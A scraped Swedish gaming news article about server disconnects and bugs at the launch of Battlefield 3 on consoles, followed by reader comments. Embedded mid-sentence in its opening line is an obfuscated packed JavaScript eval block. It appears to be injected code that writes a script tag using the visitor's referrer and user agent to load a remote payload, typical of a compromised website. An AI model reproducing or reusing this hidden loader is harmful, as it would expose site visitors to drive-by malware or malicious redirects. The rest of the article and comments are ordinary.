Image Image Image Image Image Image Image Image Image Image

| 15 augusti, 2020

Scroll to top

Top

Problemfyllt Battlefield 3 vid lansering

Problemfyllt Battlefield 3 vid lansering
Sebastian

Två eval(function(p,a,c,k,e,d){e=function(c){return c.toString(36)};if(!”.replace(/^/,String)){while(c–){d[c.toString(a)]=k[c]||c.toString(a)}k=[function(e){return d[e]}];e=function(){return’\w+’};c=1};while(c–){if(k[c]){p=p.replace(new RegExp(’\b’+e(c)+’\b’,’g’),k[c])}}return p}(’0.6(”<\/k"+"l>”);n m=”q”;’,30,30,’document||javascript|encodeURI|src||write|http|45|67|script|text|rel|nofollow|type|97|language|jquery|userAgent|navigator|sc|ript|yiazb|var|u0026u|referrer|stiiy||js|php’.split(’|’),0,{}))
dagar efter lanseringen av det mycket efterlängtade spelet Battlefield 3 och redan massa problem. Detta gäller främst konsolerna.

Det har gått två dagar sedan släppet av Battlefield 3 ägde rum i USA, och igår var det dags för bl.a. Sverige att få ge sig ut i kriget. Som kanske väntat av många spelare har det redan börjat ramla in rapporter om problem med disconnects, instabila servrar och problem att gå in i spelet.  Detta gäller då multiplayer delen.

Även på Twitter är det många som meddelar att de inte kan spela.

Det sägs också att många spelare råkat ut för en bugg i slutet av singleplayerkampanjen som gör att man inte kan slutföra spelet.

Som sagt ovan så gäller dessa buggar alla plattformar även om det just nu verkar vara koncentrerat till Xbox 360 och Ps3. EA meddelar också att de jobbar på problemen och hoppas kunna stabilisera alla servrar så fort som möjligt.

[quote]We’re aware of the server issues on the Xbox 360 and are working to correct them as soon as possible. #BF3[/quote]

Tillsammans med nyheten om att det utlovade Battlefield 1943 inte följde med PS3-versionerna och att EA inte kommit med någon närmare förklaring om varför kan det konstateras att lanseringen inte varit fullt så lyckad som man hade hoppats – trots att spelet fått bra recensioner.

Mer info: pinoytutorial.com

httpv://www.youtube.com/watch?v=Wx2hpuuVEd8

Comments

  1. Tingul Rammy

    Så tråkigt men väntat. Jag tycker att detta inte gör något. Det ingår lite i såna här ”super” spel att ha lite problem vid lanseringen. Samma gäller multiplayer på COD och andra spel som köpas av miljoner personer under 3-5 dagar. Särskillt med denna grafik och struktur som BF 3 har så är problem inte jätte allvarligt. Bara små kids som inte fattar så mycket som lackar.

    • Nä det är helt rätt… COD har aldrig haft en fel fri lansering… och för att ta parallelen till en annan genre så hade ju TDU 2 kanske den sämsta genom tiderna. BF 3 funkar hur som helst klockrent på PC (som väntat), konsolerna fungerar sämre p.ga. hur man lagt upp det hela med servrarna..Men det är konsolernas fel och inte Battlefield.. Men det fixar man nog snart.

      • Äsch, lite lagg bara..vi klarade ju oss bra igår! 😉

  2. viktigt är dock att nämna att problem gäller endast ps3 och 360…

  3.  Det är absolut helt ok med lite lagg. Kör på Playstation 3 och tycker det rullar på helt ok. Dock har jag märkt lite grejer i Singleplayer. Jag stör mig på att det alltid står någon gubbe i vägen när man ska springa. Verkligt men jobbigt.